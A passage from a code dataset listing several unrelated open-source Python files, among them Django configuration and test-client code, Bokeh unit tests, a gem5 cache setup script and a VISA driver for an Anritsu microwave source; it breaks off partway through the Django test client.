| code | repo_name | path | language | license | size |
|---|---|---|---|---|---|
| stringlengths 2-1.05M | stringlengths 5-104 | stringlengths 4-251 | stringclasses 1 value | stringclasses 15 values | int32 2-1.05M |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.views.i18n import javascript_catalog
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtailcore import urls as wagtail_urls
from privagal.core import urls as privagalcore_urls
urlpatterns = [
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^jsi18n/$', javascript_catalog, name='javascript-catalog'),
url(r'^gallery/', include('privagal.gallery.urls', namespace='galleries')),
url(r'^{}'.format(settings.MEDIA_URL[1:]), include(privagalcore_urls)),
url(r'', include(wagtail_urls)),
]
| ychab/privagal | privagal/urls.py | Python | bsd-3-clause | 689 |
import re
import random
import hashlib
from django.db import models
SHA1_RE = re.compile('^[a-f0-9]{40}$')
class RegistrationManager(models.Manager):
"""Custom manager for the ``RegistrationProfile`` model.
The methods defined here provide shortcuts for account creation
and activation (including generation and emailing of activation
keys), and for cleaning out expired inactive accounts.
"""
def activate_user(self, activation_key):
"""Validate an activation key and activate the corresponding
``User`` if valid.
If the key is valid and has not expired, return the ``User``
after activating.
If the key is not valid or has expired, return ``False``.
If the key is valid but the ``User`` is already active,
return ``False``.
"""
# Make sure the key we're trying conforms to the pattern of a
# SHA1 hash; if it doesn't, no point trying to look it up in
# the database.
if SHA1_RE.search(activation_key):
try:
profile = self.get(activation_key=activation_key)
except self.model.DoesNotExist:
return False
return profile.activate()
def create_profile(self, user):
"""Create a ``RegistrationProfile`` for a given ``User``, and return
the ``RegistrationProfile``.
The activation key for the ``RegistrationProfile`` will be a SHA1 hash,
generated from a combination of the ``User``'s username and a random
salt.
"""
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
username = user.username
if isinstance(username, unicode):
username = username.encode('utf-8')
activation_key = hashlib.sha1(salt+username).hexdigest()
return self.create(user=user, activation_key=activation_key)
| bruth/django-registration2 | registration/managers.py | Python | bsd-3-clause | 1,879 |
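The manager above pairs key generation (`create_profile`) with key validation (`activate_user`). As a rough illustration of that flow, here is a minimal sketch assuming the usual django-registration layout in which `RegistrationProfile.objects` is a `RegistrationManager`; the import path and function names are illustrative, not taken from the repository.

```python
# Minimal sketch of the intended flow; assumes RegistrationProfile.objects
# is a RegistrationManager as in the usual django-registration layout.
from registration.models import RegistrationProfile

def start_registration(user):
    # Generates and stores the SHA1 activation key for this user.
    profile = RegistrationProfile.objects.create_profile(user)
    return profile.activation_key  # typically e-mailed to the user

def finish_registration(activation_key):
    # Returns the activated User, or a falsy value if the key is
    # malformed, unknown, or already used.
    return RegistrationProfile.objects.activate_user(activation_key)
```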
from django.conf import settings
from csp.utils import build_policy
class CSPMiddleware(object):
"""
Implements the X-Content-Security-Policy response header, which
conforming user-agents can use to restrict the permitted sources
of various content.
See https://wiki.mozilla.org/Security/CSP/Specification
"""
def process_response(self, request, response):
if getattr(response, '_csp_exempt', False):
return response
# Check for ignored path prefix.
for prefix in getattr(settings, 'CSP_EXCLUDE_URL_PREFIXES', []):
if request.path_info.startswith(prefix):
return response
header = 'X-Content-Security-Policy'
if getattr(settings, 'CSP_REPORT_ONLY', False):
header = 'X-Content-Security-Policy-Report-Only'
if header in response:
# Don't overwrite existing headers.
return response
if getattr(settings, 'CSP_POLICY_URI', False):
policy = 'policy-uri ' + settings.CSP_POLICY_URI
else:
policy = build_policy()
response[header] = policy
return response
| jsocol/django-csp | csp/middleware.py | Python | bsd-3-clause | 1,167 |
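The middleware is driven entirely by settings it reads via `getattr`. A hedged configuration sketch follows; the setting names are taken from the code above, and the `MIDDLEWARE_CLASSES` entry reflects the old-style, `process_response`-based middleware API this class implements (the prefix and policy URI values are only examples).

```python
# settings.py sketch for the middleware above (old-style middleware API).
MIDDLEWARE_CLASSES = [
    # ...
    'csp.middleware.CSPMiddleware',
]

# Emit X-Content-Security-Policy-Report-Only instead of the enforcing header.
CSP_REPORT_ONLY = False

# Skip the CSP header entirely for matching path prefixes.
CSP_EXCLUDE_URL_PREFIXES = ['/admin/']

# If set, send "policy-uri <value>" instead of a policy built by build_policy().
# CSP_POLICY_URI = '/csp-policy.xml'
```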
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from Ruby import create_topology
from Ruby import send_evicts
#
# Declare caches used by the protocol
#
class L1Cache(RubyCache): pass
def define_options(parser):
return
def create_system(options, full_system, system, dma_ports, ruby_system):
if buildEnv['PROTOCOL'] != 'MI_example':
panic("This script requires the MI_example protocol to be built.")
cpu_sequencers = []
#
# The ruby network creation expects the list of nodes in the system to be
# consistent with the NetDest list. Therefore the l1 controller nodes must be
# listed before the directory nodes and directory nodes before dma nodes, etc.
#
l1_cntrl_nodes = []
dir_cntrl_nodes = []
dma_cntrl_nodes = []
#
# Must create the individual controllers before the network to ensure the
# controller constructors are called before the network constructor
#
block_size_bits = int(math.log(options.cacheline_size, 2))
for i in xrange(options.num_cpus):
#
# First create the Ruby objects associated with this cpu
# Only one cache exists for this protocol, so by default use the L1D
# config parameters.
#
cache = L1Cache(size = options.l1d_size,
assoc = options.l1d_assoc,
start_index_bit = block_size_bits)
#
# Only one unified L1 cache exists. Can cache instructions and data.
#
l1_cntrl = L1Cache_Controller(version = i,
cacheMemory = cache,
send_evictions = send_evicts(options),
transitions_per_cycle = options.ports,
clk_domain=system.cpu[i].clk_domain,
ruby_system = ruby_system)
cpu_seq = RubySequencer(version = i,
icache = cache,
dcache = cache,
clk_domain=system.cpu[i].clk_domain,
ruby_system = ruby_system)
l1_cntrl.sequencer = cpu_seq
exec("ruby_system.l1_cntrl%d = l1_cntrl" % i)
# Add controllers and sequencers to the appropriate lists
cpu_sequencers.append(cpu_seq)
l1_cntrl_nodes.append(l1_cntrl)
# Connect the L1 controllers and the network
l1_cntrl.mandatoryQueue = MessageBuffer()
l1_cntrl.requestFromCache = MessageBuffer(ordered = True)
l1_cntrl.requestFromCache.master = ruby_system.network.slave
l1_cntrl.responseFromCache = MessageBuffer(ordered = True)
l1_cntrl.responseFromCache.master = ruby_system.network.slave
l1_cntrl.forwardToCache = MessageBuffer(ordered = True)
l1_cntrl.forwardToCache.slave = ruby_system.network.master
l1_cntrl.responseToCache = MessageBuffer(ordered = True)
l1_cntrl.responseToCache.slave = ruby_system.network.master
phys_mem_size = sum(map(lambda r: r.size(), system.mem_ranges))
assert(phys_mem_size % options.num_dirs == 0)
mem_module_size = phys_mem_size / options.num_dirs
# Run each of the ruby memory controllers at a ratio of the frequency of
# the ruby system.
# clk_divider value is a fix to pass regression.
ruby_system.memctrl_clk_domain = DerivedClockDomain(
clk_domain=ruby_system.clk_domain,
clk_divider=3)
for i in xrange(options.num_dirs):
dir_size = MemorySize('0B')
dir_size.value = mem_module_size
dir_cntrl = Directory_Controller(version = i,
directory = RubyDirectoryMemory(
version = i, size = dir_size),
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.dir_cntrl%d = dir_cntrl" % i)
dir_cntrl_nodes.append(dir_cntrl)
# Connect the directory controllers and the network
dir_cntrl.requestToDir = MessageBuffer(ordered = True)
dir_cntrl.requestToDir.slave = ruby_system.network.master
dir_cntrl.dmaRequestToDir = MessageBuffer(ordered = True)
dir_cntrl.dmaRequestToDir.slave = ruby_system.network.master
dir_cntrl.responseFromDir = MessageBuffer()
dir_cntrl.responseFromDir.master = ruby_system.network.slave
dir_cntrl.dmaResponseFromDir = MessageBuffer(ordered = True)
dir_cntrl.dmaResponseFromDir.master = ruby_system.network.slave
dir_cntrl.forwardFromDir = MessageBuffer()
dir_cntrl.forwardFromDir.master = ruby_system.network.slave
dir_cntrl.responseFromMemory = MessageBuffer()
for i, dma_port in enumerate(dma_ports):
#
# Create the Ruby objects associated with the dma controller
#
dma_seq = DMASequencer(version = i,
ruby_system = ruby_system)
dma_cntrl = DMA_Controller(version = i,
dma_sequencer = dma_seq,
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.dma_cntrl%d = dma_cntrl" % i)
exec("ruby_system.dma_cntrl%d.dma_sequencer.slave = dma_port" % i)
dma_cntrl_nodes.append(dma_cntrl)
# Connect the directory controllers and the network
dma_cntrl.mandatoryQueue = MessageBuffer()
dma_cntrl.requestToDir = MessageBuffer()
dma_cntrl.requestToDir.master = ruby_system.network.slave
dma_cntrl.responseFromDir = MessageBuffer(ordered = True)
dma_cntrl.responseFromDir.slave = ruby_system.network.master
all_cntrls = l1_cntrl_nodes + dir_cntrl_nodes + dma_cntrl_nodes
# Create the io controller and the sequencer
if full_system:
io_seq = DMASequencer(version=len(dma_ports), ruby_system=ruby_system)
ruby_system._io_port = io_seq
io_controller = DMA_Controller(version = len(dma_ports),
dma_sequencer = io_seq,
ruby_system = ruby_system)
ruby_system.io_controller = io_controller
# Connect the dma controller to the network
io_controller.mandatoryQueue = MessageBuffer()
io_controller.requestToDir = MessageBuffer()
io_controller.requestToDir.master = ruby_system.network.slave
io_controller.responseFromDir = MessageBuffer(ordered = True)
io_controller.responseFromDir.slave = ruby_system.network.master
all_cntrls = all_cntrls + [io_controller]
topology = create_topology(all_cntrls, options)
return (cpu_sequencers, dir_cntrl_nodes, topology)
| ayoubg/gem5-graphics | gem5/configs/ruby/MI_example.py | Python | bsd-3-clause | 8,604 |
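Two derived quantities in `create_system()` above are easy to miss: the cache index offset computed from the cache-line size, and the per-directory memory size. A standalone sketch of the same arithmetic is below; the concrete numbers are made-up examples, not gem5 defaults, and integer division is used where the original Python 2 script relies on `/`.

```python
# Stand-alone illustration of the arithmetic used in create_system() above.
import math

cacheline_size = 64                                  # bytes per cache line (example)
block_size_bits = int(math.log(cacheline_size, 2))   # 6 offset bits, used as start_index_bit

phys_mem_size = 4 * 1024 ** 3                        # 4 GiB simulated memory (example)
num_dirs = 4
assert phys_mem_size % num_dirs == 0                 # same check as the script
mem_module_size = phys_mem_size // num_dirs          # 1 GiB handled by each directory
```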
# proxy module
from traitsui.qt4.ui_live import *
| enthought/etsproxy | enthought/traits/ui/qt4/ui_live.py | Python | bsd-3-clause | 50 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh.core.properties import Int, List, String
from bokeh.models import * # NOQA
from bokeh.models import CustomJS
from bokeh.plotting import * # NOQA
from bokeh.document import document # isort:skip
# Module under test
from bokeh.model import Model # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class SomeModel(Model):
a = Int(12)
b = String("hello")
c = List(Int, [1, 2, 3])
class Test_js_on_change:
def test_exception_for_no_callbacks(self) -> None:
m = SomeModel()
with pytest.raises(ValueError):
m.js_on_change('foo')
def test_exception_for_bad_callbacks(self) -> None:
m = SomeModel()
for val in [10, "bar", None, [1], {}, 10.2]:
with pytest.raises(ValueError):
m.js_on_change('foo', val)
def test_with_propname(self) -> None:
cb = CustomJS(code="")
m0 = SomeModel()
for name in m0.properties():
m = SomeModel()
m.js_on_change(name, cb)
assert m.js_property_callbacks == {"change:%s" % name: [cb]}
def test_with_non_propname(self) -> None:
cb = CustomJS(code="")
m1 = SomeModel()
m1.js_on_change('foo', cb)
assert m1.js_property_callbacks == {"foo": [cb]}
m2 = SomeModel()
m2.js_on_change('change:b', cb)
assert m2.js_property_callbacks == {"change:b": [cb]}
def test_with_multple_callbacks(self) -> None:
cb1 = CustomJS(code="")
cb2 = CustomJS(code="")
m = SomeModel()
m.js_on_change('foo', cb1, cb2)
assert m.js_property_callbacks == {"foo": [cb1, cb2]}
def test_with_multple_callbacks_separately(self) -> None:
cb1 = CustomJS(code="")
cb2 = CustomJS(code="")
m = SomeModel()
m.js_on_change('foo', cb1)
assert m.js_property_callbacks == {"foo": [cb1]}
m.js_on_change('foo', cb2)
assert m.js_property_callbacks == {"foo": [cb1, cb2]}
def test_ignores_dupe_callbacks(self) -> None:
cb = CustomJS(code="")
m = SomeModel()
m.js_on_change('foo', cb, cb)
assert m.js_property_callbacks == {"foo": [cb]}
class Test_js_on_event:
def test_with_multple_callbacks(self) -> None:
cb1 = CustomJS(code="foo")
cb2 = CustomJS(code="bar")
m = SomeModel()
m.js_on_event("some", cb1, cb2)
assert m.js_event_callbacks == {"some": [cb1, cb2]}
def test_with_multple_callbacks_separately(self) -> None:
cb1 = CustomJS(code="foo")
cb2 = CustomJS(code="bar")
m = SomeModel()
m.js_on_event("some", cb1)
assert m.js_event_callbacks == {"some": [cb1]}
m.js_on_event("some", cb2)
assert m.js_event_callbacks == {"some": [cb1, cb2]}
def test_ignores_dupe_callbacks(self) -> None:
cb = CustomJS(code="foo")
m = SomeModel()
m.js_on_event("some", cb, cb)
assert m.js_event_callbacks == {"some": [cb]}
def test_ignores_dupe_callbacks_separately(self) -> None:
cb = CustomJS(code="foo")
m = SomeModel()
m.js_on_event("some", cb)
assert m.js_event_callbacks == {"some": [cb]}
m.js_on_event("some", cb)
assert m.js_event_callbacks == {"some": [cb]}
class Test_js_link:
def test_value_error_on_bad_attr(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
with pytest.raises(ValueError) as e:
m1.js_link('junk', m2, 'b')
assert str(e.value).endswith("%r is not a property of self (%r)" % ("junk", m1))
def test_value_error_on_bad_other(self) -> None:
m1 = SomeModel()
with pytest.raises(ValueError) as e:
m1.js_link('a', 'junk', 'b')
assert str(e.value).endswith("'other' is not a Bokeh model: %r" % "junk")
def test_value_error_on_bad_other_attr(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
with pytest.raises(ValueError) as e:
m1.js_link('a', m2, 'junk')
assert str(e.value).endswith("%r is not a property of other (%r)" % ("junk", m2))
def test_creates_customjs(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b')
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a"
def test_attr_selector_creates_customjs_int(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b', 1)
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a[1]"
def test_attr_selector_creates_customjs_with_zero(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b', 0)
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a[0]"
def test_attr_selector_creates_customjs_str(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b', "test")
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a['test']"
def test_all_builtin_models_default_constructible() -> None:
bad = []
for name, cls in Model.model_class_reverse_map.items():
try:
cls()
except Exception:
bad.append(name)
assert bad == []
def test_select() -> None:
# we aren't trying to replace test_query here, only test
# our wrappers around it, so no need to try every kind of
# query
d = document.Document()
root1 = SomeModel(a=42, name='a')
root2 = SomeModel(a=43, name='c')
root3 = SomeModel(a=44, name='d')
root4 = SomeModel(a=45, name='d')
d.add_root(root1)
d.add_root(root2)
d.add_root(root3)
d.add_root(root4)
# select()
assert {root1} == set(root1.select(dict(a=42)))
assert {root1} == set(root1.select(dict(name="a")))
assert {root2} == set(root2.select(dict(name="c")))
assert set() == set(root1.select(dict(name="nope")))
# select() on object
assert set() == set(root3.select(dict(name='a')))
assert {root3} == set(root3.select(dict(a=44)))
# select_one()
assert root3 == root3.select_one(dict(name='d'))
assert None == root1.select_one(dict(name='nope'))
with pytest.raises(ValueError) as e:
d.select_one(dict(name='d'))
assert 'Found more than one' in repr(e)
# select_one() on object
assert None == root3.select_one(dict(name='a'))
assert None == root3.select_one(dict(name='c'))
# set_select()
root1.set_select(dict(a=42), dict(name="c", a=44))
assert {root1} == set(root1.select(dict(name="c")))
assert {root1} == set(root1.select(dict(a=44)))
# set_select() on object
root3.set_select(dict(name='d'), dict(a=57))
assert {root3} == set(root3.select(dict(a=57)))
# set_select() on class
root2.set_select(SomeModel, dict(name='new_name'))
assert {root2} == set(root2.select(dict(name="new_name")))
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| bokeh/bokeh | tests/unit/bokeh/model/test_model.py | Python | bsd-3-clause | 9,709 |
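The tests above pin down the public behaviour of `js_on_change`, `js_on_event` and `js_link`. A condensed usage sketch derived from those assertions (the `Slider` widget is just a convenient stand-in for any Bokeh model):

```python
# Condensed from the assertions in the tests above.
from bokeh.models import CustomJS, Slider

slider = Slider(start=0, end=10, value=1, step=1)
cb = CustomJS(code="console.log('value changed')")

# Registered under "change:value"; duplicate callbacks for the same key are ignored.
slider.js_on_change('value', cb)

# js_link generates an equivalent CustomJS of the form "other.<attr> = this.<attr>".
other = Slider(start=0, end=10, value=1, step=1)
slider.js_link('value', other, 'value')
```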
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2015-2018 by ExopyHqcLegacy Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Drivers for Anritsu instrument using VISA library.
"""
import re
from textwrap import fill
from inspect import cleandoc
from visa import VisaTypeError
from ..driver_tools import (InstrIOError, secure_communication,
instrument_property)
from ..visa_tools import VisaInstrument
class AnritsuMG3694(VisaInstrument):
"""Driver for the Anritsu MG 3694 microwave source.
"""
def __init__(self, connection_info, caching_allowed=True,
caching_permissions={}, auto_open=True):
super(AnritsuMG3694, self).__init__(connection_info,
caching_allowed,
caching_permissions,
auto_open)
self.frequency_unit = 'GHz'
def open_connection(self, **para):
"""Open the connection to the instr using the `connection_str`.
"""
super(AnritsuMG3694, self).open_connection(**para)
self.write_termination = '\n'
self.read_termination = '\n'
self.write("DSPL 4")
self.write("EBW3") # if the external reference is very stable in phase
# the largest EBW must be chosen
self.write("LO0") # no offset on the power
self.write("LOG") # Selects logarithmic power level operation in dBm
self.write("TR1") # Sets 40 dB of attenuation when RF is switched off
self.write("PS1") # Turns on the Phase Offset
self.write("DS1") # Turns off the secure mode
self.write("AT1") # Selects ALC step attenuator decoupling
self.write("IL1") # Selects internal leveling of output power
@instrument_property
@secure_communication()
def frequency(self):
"""Frequency getter method
"""
freq = self.ask_for_values('FREQ?')[0]
if freq:
if self.frequency_unit == 'GHz':
return freq/1e9
elif self.frequency_unit == 'MHz':
return freq/1e6
elif self.frequency_unit == 'kHz':
return freq/1e3
else:
return freq
else:
raise InstrIOError('Anritsu signal source did not return the frequency')
@frequency.setter
@secure_communication()
def frequency(self, value):
"""Frequency setter method
"""
unit = self.frequency_unit
self.write('FREQ {}{}'.format(value, unit))
result = self.ask_for_values('FREQ?')
if result:
if unit == 'GHz':
result[0] /= 1e9
elif unit == 'MHz':
result[0] /= 1e6
elif unit == 'kHz':
result[0] /= 1e3
if abs(result[0] - value) > 10**-12:
mes = 'Instrument did not set correctly the frequency'
raise InstrIOError(mes)
@instrument_property
@secure_communication()
def power(self):
"""Power getter method
"""
power = self.ask_for_values(':POW?')[0]
if power is not None:
return power
else:
raise InstrIOError
@power.setter
@secure_communication()
def power(self, value):
"""Power setter method
"""
self.write('POW {}'.format(value))
result = self.ask_for_values('POW?')[0]
if abs(result - value) > 10**-12:
raise InstrIOError('Instrument did not set correctly the power')
@instrument_property
@secure_communication()
def output(self):
"""Output getter method
"""
output = self.ask_for_values('OUTP?')[0]
if output == 1:
return 'ON'
elif output == 0:
return 'OFF'
else:
mes = 'Anritsu signal source did not return its output'
raise InstrIOError(mes)
@output.setter
@secure_communication()
def output(self, value):
"""Output setter method. 'ON', 'OFF'
"""
on = re.compile('on', re.IGNORECASE)
off = re.compile('off', re.IGNORECASE)
if on.match(value) or value == 1:
self.write('OUTP 1')
if self.ask_for_values('OUTP?')[0] != 1:
raise InstrIOError(cleandoc('''Instrument did not set correctly
the output'''))
elif off.match(value) or value == 0:
self.write('OUTP 0')
if self.ask_for_values('OUTP?')[0] != 0:
raise InstrIOError(cleandoc('''Instrument did not set correctly
the output'''))
else:
mess = fill(cleandoc('''The invalid value {} was sent to
switch_on_off method''').format(value), 80)
raise VisaTypeError(mess)
| Ecpy/ecpy_hqc_legacy | exopy_hqc_legacy/instruments/drivers/visa/anritsu_signal_source.py | Python | bsd-3-clause | 5,187 |
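Through the `driver_tools` property machinery, the driver above exposes `frequency`, `power` and `output` as instrument properties. A hedged usage sketch follows; the contents of `connection_info` depend on the local VISA setup, so the resource key and value shown are purely illustrative.

```python
# Illustrative only: the connection_info keys depend on the local VISA setup.
from exopy_hqc_legacy.instruments.drivers.visa.anritsu_signal_source import AnritsuMG3694

source = AnritsuMG3694({'resource_name': 'GPIB0::5::INSTR'})  # assumed key name
source.frequency_unit = 'GHz'   # default set in __init__
source.frequency = 5.0          # written as "FREQ 5.0GHz", then read back and checked
source.power = -10              # dBm, verified against "POW?" after writing
source.output = 'ON'            # accepts 'ON'/'OFF' (case-insensitive) or 1/0
source.output = 'OFF'
```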
from __future__ import unicode_literals
import json
import mimetypes
import os
import re
import sys
from copy import copy
from importlib import import_module
from io import BytesIO
from django.conf import settings
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import ISO_8859_1, UTF_8, WSGIRequest
from django.core.signals import (
got_request_exception, request_finished, request_started,
)
from django.db import close_old_connections
from django.http import HttpRequest, QueryDict, SimpleCookie
from django.template import TemplateDoesNotExist
from django.test import signals
from django.test.utils import ContextList
from django.urls import resolve
from django.utils import six
from django.utils.encoding import force_bytes, force_str, uri_to_iri
from django.utils.functional import SimpleLazyObject, curry
from django.utils.http import urlencode
from django.utils.itercompat import is_iterable
from django.utils.six.moves.urllib.parse import urlparse, urlsplit
__all__ = ('Client', 'RedirectCycleError', 'RequestFactory', 'encode_file', 'encode_multipart')
BOUNDARY = 'BoUnDaRyStRiNg'
MULTIPART_CONTENT = 'multipart/form-data; boundary=%s' % BOUNDARY
CONTENT_TYPE_RE = re.compile('.*; charset=([\w\d-]+);?')
class RedirectCycleError(Exception):
"""
The test client has been asked to follow a redirect loop.
"""
def __init__(self, message, last_response):
super(RedirectCycleError, self).__init__(message)
self.last_response = last_response
self.redirect_chain = last_response.redirect_chain
class FakePayload(object):
"""
A wrapper around BytesIO that restricts what can be read since data from
the network can't be seeked and cannot be read outside of its content
length. This makes sure that views can't do anything under the test client
that wouldn't work in Real Life.
"""
def __init__(self, content=None):
self.__content = BytesIO()
self.__len = 0
self.read_started = False
if content is not None:
self.write(content)
def __len__(self):
return self.__len
def read(self, num_bytes=None):
if not self.read_started:
self.__content.seek(0)
self.read_started = True
if num_bytes is None:
num_bytes = self.__len or 0
assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
content = self.__content.read(num_bytes)
self.__len -= num_bytes
return content
def write(self, content):
if self.read_started:
raise ValueError("Unable to write a payload after he's been read")
content = force_bytes(content)
self.__content.write(content)
self.__len += len(content)
def closing_iterator_wrapper(iterable, close):
try:
for item in iterable:
yield item
finally:
request_finished.disconnect(close_old_connections)
close() # will fire request_finished
request_finished.connect(close_old_connections)
def conditional_content_removal(request, response):
"""
Simulate the behavior of most Web servers by removing the content of
responses for HEAD requests, 1xx, 204, and 304 responses. Ensures
compliance with RFC 2616, section 4.3.
"""
if 100 <= response.status_code < 200 or response.status_code in (204, 304):
if response.streaming:
response.streaming_content = []
else:
response.content = b''
response['Content-Length'] = '0'
if request.method == 'HEAD':
if response.streaming:
response.streaming_content = []
else:
response.content = b''
return response
class ClientHandler(BaseHandler):
"""
A HTTP Handler that can be used for testing purposes. Uses the WSGI
interface to compose requests, but returns the raw HttpResponse object with
the originating WSGIRequest attached to its ``wsgi_request`` attribute.
"""
def __init__(self, enforce_csrf_checks=True, *args, **kwargs):
self.enforce_csrf_checks = enforce_csrf_checks
super(ClientHandler, self).__init__(*args, **kwargs)
def __call__(self, environ):
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
request_started.disconnect(close_old_connections)
request_started.send(sender=self.__class__, environ=environ)
request_started.connect(close_old_connections)
request = WSGIRequest(environ)
# sneaky little hack so that we can easily get round
# CsrfViewMiddleware. This makes life easier, and is probably
# required for backwards compatibility with external tests against
# admin views.
request._dont_enforce_csrf_checks = not self.enforce_csrf_checks
# Request goes through middleware.
response = self.get_response(request)
# Simulate behaviors of most Web servers.
conditional_content_removal(request, response)
# Attach the originating request to the response so that it could be
# later retrieved.
response.wsgi_request = request
# We're emulating a WSGI server; we must call the close method
# on completion.
if response.streaming:
response.streaming_content = closing_iterator_wrapper(
response.streaming_content, response.close)
else:
request_finished.disconnect(close_old_connections)
response.close() # will fire request_finished
request_finished.connect(close_old_connections)
return response
def store_rendered_templates(store, signal, sender, template, context, **kwargs):
"""
Stores templates and contexts that are rendered.
The context is copied so that it is an accurate representation at the time
of rendering.
"""
store.setdefault('templates', []).append(template)
if 'context' not in store:
store['context'] = ContextList()
store['context'].append(copy(context))
def encode_multipart(boundary, data):
"""
Encodes multipart POST data from a dictionary of form values.
The key will be used as the form data name; the value will be transmitted
as content. If the value is a file, the contents of the file will be sent
as an application/octet-stream; otherwise, str(value) will be sent.
"""
lines = []
def to_bytes(s):
return force_bytes(s, settings.DEFAULT_CHARSET)
# Not by any means perfect, but good enough for our purposes.
def is_file(thing):
return hasattr(thing, "read") and callable(thing.read)
# Each bit of the multipart form data could be either a form value or a
# file, or a *list* of form values and/or files. Remember that HTTP field
# names can be duplicated!
for (key, value) in data.items():
if is_file(value):
lines.extend(encode_file(boundary, key, value))
elif not isinstance(value, six.string_types) and is_iterable(value):
for item in value:
if is_file(item):
lines.extend(encode_file(boundary, key, item))
else:
lines.extend(to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
item
])
else:
lines.extend(to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
value
])
lines.extend([
to_bytes('--%s--' % boundary),
b'',
])
return b'\r\n'.join(lines)
def encode_file(boundary, key, file):
def to_bytes(s):
return force_bytes(s, settings.DEFAULT_CHARSET)
filename = os.path.basename(file.name) if hasattr(file, 'name') else ''
if hasattr(file, 'content_type'):
content_type = file.content_type
elif filename:
content_type = mimetypes.guess_type(filename)[0]
else:
content_type = None
if content_type is None:
content_type = 'application/octet-stream'
if not filename:
filename = key
return [
to_bytes('--%s' % boundary),
to_bytes('Content-Disposition: form-data; name="%s"; filename="%s"'
% (key, filename)),
to_bytes('Content-Type: %s' % content_type),
b'',
to_bytes(file.read())
]
class RequestFactory(object):
"""
Class that lets you create mock Request objects for use in testing.
Usage:
rf = RequestFactory()
get_request = rf.get('/hello/')
post_request = rf.post('/submit/', {'foo': 'bar'})
Once you have a request object you can pass it to any view function,
